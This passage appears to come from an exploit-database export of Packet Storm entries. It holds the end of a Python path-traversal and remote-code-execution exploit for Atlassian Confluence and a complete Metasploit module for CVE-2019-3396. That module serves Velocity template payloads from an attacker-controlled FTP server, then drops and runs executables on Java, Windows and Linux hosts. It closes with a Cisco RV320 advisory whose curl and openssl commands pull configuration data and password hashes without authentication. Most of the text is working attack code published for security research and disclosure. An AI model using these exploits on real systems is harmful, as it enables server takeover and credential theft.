path traversal. \n \nArgs: \ntarget_remote_path (string): path on local file system of the target application \ndecode_output (bool): set to True if output of the file will be character codes separated by new lines, \nused with RCE \n\"\"\" \npost_data = { \n\"contentId\": str(random.randint(1, 10000)), \n\"macro\": { \n\"body\": \"\", \n\"name\": \"widget\", \n\"params\": { \n\"_template\": f\"file://{target_remote_path}\", \n\"url\": \"https://www.youtube.com/watch?v=\" + ''.join(random.choice( \nstring.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11)) \n} \n} \n} \n \nlog.info(\"sending request towards vulnerable endpoint with payload in '_template' parameter\") \nresponse = requests.post( \nself._target_url, \nheaders={ \n\"Content-Type\": \"application/json; charset=utf-8\" \n}, \njson=post_data, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"exploit failed\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \n# if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve \n# the requested path \nerror_element = soup.find_all(\"div\", \"widget-error\") \nif error_element: \nlog.warning(\"failed to retrieve target path on the system\") \nlog.warning(\"target path does not exist or application does not have appropriate permissions to view it\") \nreturn \"\" \nelse: \n# otherwise parse out the actual response (file content or directory listing) \noutput_element = soup.find_all(\"div\", \"wiki-content\") \n \nif not output_element: \nexit_log(log, \"application did not return appropriate HTML element\") \nif not len(output_element) == 1: \nlog.warning(\"application unexpectedly returned multiple HTML elements, using the first one\") 
\noutput_element = output_element[0] \n \nlog.debug(\"extracting HTML element value and stripping the leading and trailing spaces\") \n# output = output_element.string.strip() \noutput = output_element.decode_contents().strip() \n \nif \"The macro 'widget' is unknown. It may have been removed from the system.\" in output: \nexit_log(log, \"widget seems to be disabled on system, target most likely is not vulnerable\") \n \nif not self._config.script_arguments.silent: \nif decode_output: \nparsed_output = \"\" \np = re.compile(r\"^([0-9]+)\") \nfor line in output.split(\"\\n\"): \nr = p.match(line) \nif r: \nparsed_output += chr(int(r.group(1))) \nprint(parsed_output.strip()) \nelse: \nprint(output) \n \nreturn output \n \ndef find_personal_space_key(self): \n\"\"\" \nMakes request that will return personal space key in the response. \n\"\"\" \nlog.debug(\"checking if user has personal space\") \nresponse = requests.get( \nself._root_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \n) \npage_content = response.text \nif \"Add personal space\" in page_content: \nlog.info(f\"user does not have personal space, creating it now...\") \n \nresponse = requests.post( \nself._create_personal_space_url, \nheaders={ \n\"Content-Type\": \"application/json\" \n}, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \njson={ \n\"spaceUserKey\": \"\" \n} \n) \n \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to create personal space\") \n \nlog.debug(f\"personal space created\") \nresponse_data = response.json() \nself._space_key = response_data.get(\"key\") \nelse: \nlog.info(\"sending request to find personal space key\") \nresponse = requests.get( \nself._personal_space_key_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... 
\nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \npersonal_space_link_element = soup.find(\"a\", id=\"view-personal-space-link\") \nif not personal_space_link_element or not personal_space_link_element.has_attr(\"href\"): \nexit_log(log, \"failed to find personal space link in the response, does the user have personal space?\") \npath = personal_space_link_element[\"href\"] \np = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX) \nr = p.match(path) \nif r: \nself._space_key = r.group(1) \nelse: \nexit_log(log, \"failed to find personal space key\") \n \nlog.debug(f\"personal space key: {self._space_key}\") \nself._personal_space_id_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?\" \\ \nf\"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}\" \nlog.debug(f\"generated personal space id url: {self._personal_space_id_url}\") \n \ndef find_personal_space_id_and_homepage_id(self): \n\"\"\" \nMakes request that will return personal space ID and homepage ID in the response. \n\"\"\" \nif self._personal_space_id_url is None: \nexit_log(log, f\"personal space id url is missing, did you call exploit functions in correct order?\") \n \nlog.info(\"sending request to find personal space ID and homepage\") \nresponse = requests.get( \nself._personal_space_id_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... 
\nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is JSON \ndata = json.loads(page_content) \n \nif \"results\" not in data: \nexit_log(log, \"failed to find 'result' section in json output\") \nitems = data[\"results\"] \nif type(items) is not list or len(items) == 0: \nexit_log(log, \"no results for personal space id\") \npersonal_space_data = items[0] \nif \"id\" not in personal_space_data: \nexit_log(log, \"failed to find ID in personal space data\") \nself._space_id = str(personal_space_data[\"id\"]) \nlog.debug(f\"found space id: {self._space_id}\") \nif \"_expandable\" not in personal_space_data: \nexit_log(log, \"failed to find '_expandable' section in personal space data\") \npersonal_space_expandable_data = personal_space_data[\"_expandable\"] \nif \"homepage\" not in personal_space_expandable_data: \nexit_log(log, \"failed to find homepage in personal space expandable data\") \nhomepage_path = personal_space_expandable_data[\"homepage\"] \np = re.compile(Exploit.HOMEPAGE_REGEX) \nr = p.match(homepage_path) \nif r: \nself._homepage_id = r.group(1) \nlog.debug(f\"found homepage id: {self._homepage_id}\") \nself._atl_token_url = f\"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}\" \nlog.debug(f\"generated atl token url: {self._atl_token_url}\") \nself._upload_url = f\"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}\" \nlog.debug(f\"generated upload url: {self._upload_url}\") \nelse: \nexit_log(log, \"failed to find homepage id, homepage path has incorrect format\") \n \ndef get_csrf_token(self): \n\"\"\" \nMakes request to get the current CSRF token for the session. 
\n\"\"\" \nif self._atl_token_url is None: \nexit_log(log, f\"atl token url is missing, did you call exploit functions in correct order?\") \n \nlog.info(\"sending request to find CSRF token\") \nresponse = requests.get( \nself._atl_token_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \natl_token_element = soup.find(\"input\", {\"name\": \"atl_token\"}) \nif not atl_token_element.has_attr(\"value\"): \nexit_log(log, \"failed to find value for atl_token\") \nself._atl_token = atl_token_element[\"value\"] \nlog.debug(f\"found CSRF token: {self._atl_token}\") \n \ndef upload_template(self): \n\"\"\" \nMakes multipart request to upload the template file to the server. \n\"\"\" \nlog.info(\"uploading template to server\") \nif not self._atl_token: \nexit_log(log, \"cannot upload a file without CSRF token\") \nif self._upload_url is None: \nexit_log(log, f\"upload url is missing, did you call exploit functions in correct order?\") \n \n# Velocity template here executes command and then captures the output. Here the output is generated by printing \n# character codes one by one in each line. This can be improved for sure but did not have time to investigate \n# why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern \n# webapp' was not working properly. This gets decoded on our python client later. 
\ntemplate = f\"\"\"#set( $test = \"test\" ) \n#set($ex = $test.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec(\"{self._config.script_arguments.command}\")) \n#set($exout = $ex.waitFor()) \n#set($out = $ex.getInputStream()) \n#foreach($i in [1..$out.available()]) \n#set($ch = $out.read()) \n$ch \n#end\"\"\" \n \nlog.debug(f\"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}\") \nparts = { \n\"atl_token\": (None, self._atl_token), \n\"file_0\": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template), \n\"confirm\": \"Attach\" \n} \nresponse = requests.post( \nself._upload_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nfiles=parts \n) \n \n# for successful upload first a 302 response needs to happen then 200 page is returned with file ID \nif response.status_code == 403: \nexit_log(log, \"got 403, probably problem with CSRF token\") \nif not len(response.history) == 1 or not response.history[0].status_code == 302: \nexit_log(log, \"failed to upload the payload\") \n \npage_content = response.content \n \nif \"Upload Failed\" in str(page_content): \nexit_log(log, \"failed to upload template\") \n \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \nfile_link_element = soup.find(\"a\", \"filename\", {\"title\": Exploit.DEFAULT_UPLOADED_FILE_NAME}) \nif not file_link_element.has_attr(\"data-linked-resource-id\"): \nexit_log(log, \"failed to find data-linked-resource-id attribute (file ID) for uploaded file link\") \nself._file_id = file_link_element[\"data-linked-resource-id\"] \nlog.debug(f\"found file ID: {self._file_id}\") \n \n \ndef exploit_path_traversal(config): \n\"\"\" \nThis sends one request towards vulnerable server to either get local file content or directory listing. 
\n\"\"\" \nlog.debug(\"running path traversal exploit\") \n \nexploit = Exploit(config) \nexploit.path_traversal(config.remote_path) \n \n \ndef exploit_rce(config): \n\"\"\"This executes multiple steps to gain RCE. Requires a session token. \n \nSteps: \n1. find personal space key for the user \n2. find personal space ID and homepage ID for the user \n3. get CSRF token (generated per session) \n4. upload template file with Java code (involves two requests, first one is 302 redirection) \n5. use path traversal part of exploit to load and execute local template file \n6. profit \n\"\"\" \nlog.debug(\"running RCE exploit\") \n \nexploit = Exploit(config) \nexploit.find_personal_space_key() \nexploit.find_personal_space_id_and_homepage_id() \nexploit.get_csrf_token() \nexploit.upload_template() \npayload_location = exploit.generate_payload_location() \nexploit.path_traversal(payload_location, decode_output=True) \n \n \nif __name__ == \"__main__\": \n# parse arguments and load all configuration items \nscript_arguments = parse_arguments() \nlog = Configuration.get_logger(script_arguments.verbosity) \n \nconfiguration = Configuration(script_arguments) \n \n# printing banner \nif not configuration.script_arguments.skip_banner: \nprint_banner() \n \nif script_arguments.quiet: \nlog.disabled = True \n \nlog.debug(\"finished parsing CLI arguments\") \nlog.debug(\"configuration was loaded successfully\") \nlog.debug(\"starting exploit\") \n \n# disabling warning about trusting self sign certificate from python requests \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \n \n# run appropriate function depending on mode \nconfiguration.script_arguments.func(configuration) \n \nlog.debug(\"done!\") \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161065/atlassiancwcm-inject.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-19T03:48:41", "description": "", "cvss3": {}, "published": 
"2019-04-18T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence Widget Connector Macro Velocity Template Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-3396"], "modified": "2019-04-18T00:00:00", "id": "PACKETSTORM:152568", "href": "https://packetstormsecurity.com/files/152568/Atlassian-Confluence-Widget-Connector-Macro-Velocity-Template-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::FtpServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Atlassian Confluence Widget Connector Macro Velocity Template Injection\", \n'Description' => %q{ \nWidget Connector Macro is part of Atlassian Confluence Server and Data Center that \nallows embedding online videos, slideshows, photostreams and more directly into a page. \nA _template parameter can be used to inject remote Java code into a Velocity template, \nand gain code execution. Authentication is not required to exploit this vulnerability. \nBy default, the Java payload will be used because it is cross-platform, but you can also \nspecify which native payload you want (Linux or Windows). \n \nConfluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version \n6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected. \n \nThis vulnerability was originally discovered by Daniil Dmitriev \nhttps://twitter.com/ddv_ua. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Daniil Dmitriev', # Discovering vulnerability \n'Dmitry (rrock) Shchannikov' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2019-3396' ], \n[ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ], \n[ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-\u3010CVE-2019-3396\u3011-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'], \n[ 'URL', 'https://paper.seebug.org/886/'] \n], \n'Targets' => \n[ \n[ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }], \n[ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }], \n[ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }] \n], \n'DefaultOptions' => \n{ \n'RPORT' => 8090, \n'SRVPORT' => 8021, \n}, \n'Privileged' => false, \n'DisclosureDate' => 'Mar 25 2019', \n'DefaultTarget' => 0, \n'Stance' => Msf::Exploit::Stance::Aggressive \n)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base to Confluence', '/']), \nOptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability', \n'https://www.youtube.com/watch?v=dQw4w9WgXcQ']) \n]) \nend \n \n# Handles ftp RETP command. \n# \n# @param c [Socket] Control connection socket. \n# @param arg [String] RETR argument. \n# @return [void] \ndef on_client_command_retr(c, arg) \nvprint_status(\"FTP download request for #{arg}\") \nconn = establish_data_connection(c) \nif(not conn) \nc.put(\"425 Can't build data connection\\r\\n\") \nreturn \nend \n \nc.put(\"150 Opening BINARY mode data connection for #{arg}\\r\\n\") \ncase arg \nwhen /check\\.vm$/ \nconn.put(wrap(get_check_vm)) \nwhen /javaprop\\.vm$/ \nconn.put(wrap(get_javaprop_vm)) \nwhen /upload\\.vm$/ \nconn.put(wrap(get_upload_vm)) \nwhen /exec\\.vm$/ \nconn.put(wrap(get_exec_vm)) \nelse \nconn.put(wrap(get_dummy_vm)) \nend \nc.put(\"226 Transfer complete.\\r\\n\") \nconn.close \nend \n \n# Handles ftp PASS command to suppress output. 
\n# \n# @param c [Socket] Control connection socket. \n# @param arg [String] PASS argument. \n# @return [void] \ndef on_client_command_pass(c, arg) \n@state[c][:pass] = arg \nvprint_status(\"#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}\") \nc.put \"230 Login OK\\r\\n\" \nend \n \n# Handles ftp EPSV command to suppress output. \n# \n# @param c [Socket] Control connection socket. \n# @param arg [String] EPSV argument. \n# @return [void] \ndef on_client_command_epsv(c, arg) \nvprint_status(\"#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'\") \nc.put(\"500 'EPSV #{arg}': command not understood.\\r\\n\") \nend \n \n# Returns an upload template. \n# \n# @return [String] \ndef get_upload_vm \n( \n<<~EOF \n$i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}')) \nEOF \n) \nend \n \n# Returns a command execution template. \n# \n# @return [String] \ndef get_exec_vm \n( \n<<~EOF \n$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor() \nEOF \n) \nend \n \n# Returns the checking template. \n# \n# @return [String] \ndef get_check_vm \n( \n<<~EOF \n#{@check_text} \nEOF \n) \nend \n \n# Returns the template that reads a Java system property. \n# \n# @return [String] \ndef get_javaprop_vm \n( \n<<~EOF \n$i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString() \nEOF \n) \nend \n \n# Returns a dummy template. \n# \n# @return [String] \ndef get_dummy_vm \n( \n<<~EOF \nEOF \n) \nend \n \n# Checks the vulnerability. 
\n# \n# @return [Array] Check code \ndef check \ncheckcode = Exploit::CheckCode::Safe \nbegin \n# Start the FTP service \nprint_status(\"Starting the FTP server.\") \nstart_service \n \n@check_text = Rex::Text.rand_text_alpha(5..10) \nres = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm\") \nif res && res.body && res.body.include?(@check_text) \ncheckcode = Exploit::CheckCode::Vulnerable \nend \nrescue Msf::Exploit::Failed => e \nvprint_error(e.message) \ncheckcode = Exploit::CheckCode::Unknown \nend \ncheckcode \nend \n \n# Injects Java code to the template. \n# \n# @param service_url [String] Address of template to injection. \n# @return [void] \ndef inject_template(service_url, timeout=20) \n \nuri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview') \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => uri, \n'headers' => { \n'Accept' => '*/*', \n'Origin' => full_uri(vhost_uri: true) \n}, \n'ctype' => 'application/json; charset=UTF-8', \n'data' => { \n'contentId' => '1', \n'macro' => { \n'name' => 'widget', \n'body' => '', \n'params' => { \n'url' => datastore['TRIGGERURL'], \n'_template' => service_url \n} \n \n} \n}.to_json \n}, timeout=timeout) \n \nunless res \nunless service_url.include?(\"exec.vm\") \nprint_warning('Connection timed out in #inject_template') \nend \nreturn \nend \n \nif res.body.include? 'widget-error' \nprint_error('Failed to inject and execute code:') \nelse \nvprint_status(\"Server response:\") \nend \n \nvprint_line(res.body) \n \nres \nend \n \n# Returns a system property for Java. \n# \n# @param prop [String] Name of the property to retrieve. \n# @return [String] \ndef get_java_property(prop) \n@prop = prop \nres = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm\") \nif res && res.body \nreturn clear_response(res.body) \nend \n'' \nend \n \n# Returns the target platform. 
\n# \n# @return [String] \ndef get_target_platform \nreturn get_java_property('os.name') \nend \n \n# Checks if the target os/platform is compatible with the module target or not. \n# \n# @return [TrueClass] Compatible \n# @return [FalseClass] Not compatible \ndef target_platform_compat?(target_platform) \ntarget.platform.names.each do |n| \nif n.downcase == 'java' || target_platform.downcase.include?(n.downcase) \nreturn true \nend \nend \n \nfalse \nend \n \n# Returns a temp path from the remote target. \n# \n# @return [String] \ndef get_tmp_path \nreturn get_java_property('java.io.tmpdir') \nend \n \n# Returns the Java home path used by Confluence. \n# \n# @return [String] \ndef get_java_home_path \nreturn get_java_property('java.home') \nend \n \n# Returns Java code that can be used to inject to the template in order to copy a file. \n# \n# @note The purpose of this method is to have a file that is not busy, so we can execute it. \n# It is meant to be used with #get_write_file_code. \n# \n# @param fname [String] The file to copy \n# @param new_fname [String] The new file \n# @return [void] \ndef get_dup_file_code(fname, new_fname) \nif fname =~ /^\\/[[:print:]]+/ \n@command = \"cp #{fname} #{new_fname}\" \nelse \n@command = \"cmd.exe /C copy #{fname} #{new_fname}\" \nend \n \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\") \nend \n \n# Returns the normalized file path for payload. \n# \n# @return [String] \ndef normalize_payload_fname(tmp_path, fname) \n# A quick way to check platform instead of actually grabbing os.name in Java system properties. \nif /^\\/[[:print:]]+/ === tmp_path \nRex::FileUtils.normalize_unix_path(tmp_path, fname) \nelse \nRex::FileUtils.normalize_win_path(tmp_path, fname) \nend \nend \n \n# Exploits the target on the Java platform. \n# \n# @return [void] \ndef exploit_as_java \n \ntmp_path = get_tmp_path \n \nif tmp_path.blank? 
\nfail_with(Failure::Unknown, 'Unable to get the temp path.') \nend \n \n@fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\") \n@b64 = Rex::Text.encode_base64(payload.encoded_jar) \n@command = '' \n \njava_home = get_java_home_path \n \nif java_home.blank? \nfail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.') \nelse \nvprint_status(\"Found Java home path: #{java_home}\") \nend \n \nregister_files_for_cleanup(@fname) \n \nif /^\\/[[:print:]]+/ === @fname \nnormalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java') \n@command = %Q|#{normalized_java_path} -jar #{@fname}| \nelse \nnormalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\\\bin\\\\java.exe') \n@fname.gsub!(/Program Files/, 'PROGRA~1') \n@command = %Q|cmd.exe /C \"#{normalized_java_path}\" -jar #{@fname}| \nend \n \nprint_status(\"Attempting to upload #{@fname}\") \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\") \n \nprint_status(\"Attempting to execute #{@fname}\") \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5) \nend \n \n \n# Exploits the target in Windows platform. \n# \n# @return [void] \ndef exploit_as_windows \ntmp_path = get_tmp_path \n \nif tmp_path.blank? 
\nfail_with(Failure::Unknown, 'Unable to get the temp path.') \nend \n \n@b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)) \n@fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\") \nnew_fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\") \n@fname.gsub!(/Program Files/, 'PROGRA~1') \nnew_fname.gsub!(/Program Files/, 'PROGRA~1') \nregister_files_for_cleanup(@fname, new_fname) \n \nprint_status(\"Attempting to upload #{@fname}\") \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\") \n \nprint_status(\"Attempting to copy payload to #{new_fname}\") \nget_dup_file_code(@fname, new_fname) \n \nprint_status(\"Attempting to execute #{new_fname}\") \n@command = new_fname \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5) \nend \n \n \n# Exploits the target in Linux platform. \n# \n# @return [void] \ndef exploit_as_linux \ntmp_path = get_tmp_path \n \nif tmp_path.blank? 
\nfail_with(Failure::Unknown, 'Unable to get the temp path.') \nend \n \n@b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)) \n@fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5)) \nnew_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6)) \nregister_files_for_cleanup(@fname, new_fname) \n \nprint_status(\"Attempting to upload #{@fname}\") \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\") \n \n@command = \"chmod +x #{@fname}\" \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\") \n \nprint_status(\"Attempting to copy payload to #{new_fname}\") \nget_dup_file_code(@fname, new_fname) \n \nprint_status(\"Attempting to execute #{new_fname}\") \n@command = new_fname \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5) \nend \n \ndef exploit \n@wrap_marker = Rex::Text.rand_text_alpha(5..10) \n \n# Start the FTP service \nprint_status(\"Starting the FTP server.\") \nstart_service \n \ntarget_platform = get_target_platform \nif target_platform.nil? \nfail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run \"check\".') \nelse \nprint_status(\"Target being detected as: #{target_platform}\") \nend \n \nunless target_platform_compat?(target_platform) \nfail_with(Failure::BadConfig, 'Selected module target does not match the actual target.') \nend \n \ncase target.name.downcase \nwhen /java$/ \nexploit_as_java \nwhen /windows$/ \nexploit_as_windows \nwhen /linux$/ \nexploit_as_linux \nend \nend \n \n# Wraps request. \n# \n# @return [String] \ndef wrap(string) \n\"#{@wrap_marker}\\n#{string}#{@wrap_marker}\\n\" \nend \n \n# Returns unwrapped response. 
\n# \n# @return [String] \ndef clear_response(string) \nif match = string.match(/#{@wrap_marker}\\n(.*)\\n#{@wrap_marker}\\n/m) \nreturn match.captures[0] \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/152568/confluence_widget_connector.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-29T02:48:42", "description": "", "cvss3": {}, "published": "2019-01-24T00:00:00", "type": "packetstorm", "title": "Cisco RV320 Unauthenticated Diagnostic Data Retrieval", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-01-24T00:00:00", "id": "PACKETSTORM:151312", "href": "https://packetstormsecurity.com/files/151312/Cisco-RV320-Unauthenticated-Diagnostic-Data-Retrieval.html", "sourceData": "`Advisory: Cisco RV320 Unauthenticated Diagnostic Data Retrieval \n \nRedTeam Pentesting discovered that the Cisco RV320 router exposes \nsensitive diagnostic data without authentication through the device's \nweb interface. \n \n \nDetails \n======= \n \nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others \nAffected Versions: 1.4.2.15, 1.4.2.17 \nFixed Versions: since 1.4.2.19 \nVulnerability Type: Information Disclosure \nSecurity Risk: high \nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-003 \nAdvisory Status: published \nCVE: CVE-2019-1653 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653 \n \n \nIntroduction \n============ \n \n\"Keep your employees, your business, and yourself productive and \neffective. 
The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal \nchoice for any small office or small business looking for performance, \nsecurity, and reliability in its network.\" \n(from the Cisco RV320 product page [1]) \n \n \nMore Details \n============ \n \nThe Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based \nconfiguration interface. In the device's firmware, this functionality is \nimplemented using a variety of CGI programs. Access to this web \ninterface requires prior authentication using a username and password. \nRedTeam Pentesting discovered the CGI program: \n \n/cgi-bin/export_debug_msg.exp \n \nThis program can be used to retrieve various diagnostic information from \nthe device, which includes its current configuration. In contrast to \nother functions, this CGI program does not require any form of \nauthentication. It may be accessed through the router's web server, \nwhich is available from the LAN by default. As described in [2], \nfirmware versions from 1.4.2 to 1.4.2.15 (inclusive) also expose the web \nserver to the WAN on TCP port 8007. \n \n \nProof of Concept \n================ \n \nThe diagnostic data can be retrieved by issuing an HTTP POST request to \nthe vulnerable CGI program. OpenSSL is used to decrypt the data with the \nhard-coded password \"NKDebug12#$%\" before unpacking it with tar (output \nshortened): \n \n------------------------------------------------------------------------ \n$ curl --data submitdebugmsg=1 \\ \n'http://192.168.1.1/cgi-bin/export_debug_msg.exp' > debug \n \n$ openssl aes-128-cbc -salt -md md5 -d \\ \n-k 'NKDebug12#$%' < debug > debug.tgz \n \n$ mkdir output && tar -xf debug.tgz -C output/ \n \n$ ls -1 output/ \ndebug_messages.txt \netc.tgz \nnk_sysconfig \nvar.tgz \n \n$ cat output/nk_sysconfig \n####sysconfig#### \n[VERSION] \nVERSION=73 \nMODEL=RV320 \nSSL=0 \nIPSEC=0 \nPPTP=0 \nPLATFORMCODE=RV0XX \n[...] 
\n[SYSTEM] \nHOSTNAME=router \nDOMAINNAME=example.com \nDOMAINCHANGE=1 \nUSERNAME=cisco \nPASSWD=066bae9070a9a95b3e03019db131cd40 \n[...] \n------------------------------------------------------------------------ \n \n \nWorkaround \n========== \n \nPrevent untrusted clients from connecting to the device's web server. \n \n \nFix \n=== \n \nInstall firmware version 1.4.2.19 (or later) on the router. \n \n \nSecurity Risk \n============= \n \nThis vulnerability is rated as a high risk as it exposes sensitive \ndiagnostic information, such as the device's configuration, to \nuntrusted, potentially malicious parties. By retrieving this \ninformation, attackers can obtain internal network configuration, VPN or \nIPsec secrets, as well as password hashes for the router's user \naccounts. Knowledge of a user's password hash is sufficient to log into \nthe router's web interface. Any information obtained through \nexploitation of this vulnerability can be used to facilitate further \ncompromise of the device itself or attached networks. \n \n \nTimeline \n======== \n \n2018-09-19 Vulnerability identified \n2018-09-27 Customer approved disclosure to vendor \n2018-09-28 Vendor notified \n2018-10-05 Receipt of advisory acknowledged by vendor \n2018-10-05 Notified vendor of disclosure date: 2019-01-09 \n2018-11-18 List of affected versions provided by vendor \n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor \n2019-01-23 Advisory published \n \n \nReferences \n========== \n \n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html \n[2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801 \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests performed by a \nteam of specialised IT-security experts. Hereby, security weaknesses in \ncompany networks or products are uncovered and can be fixed immediately. 
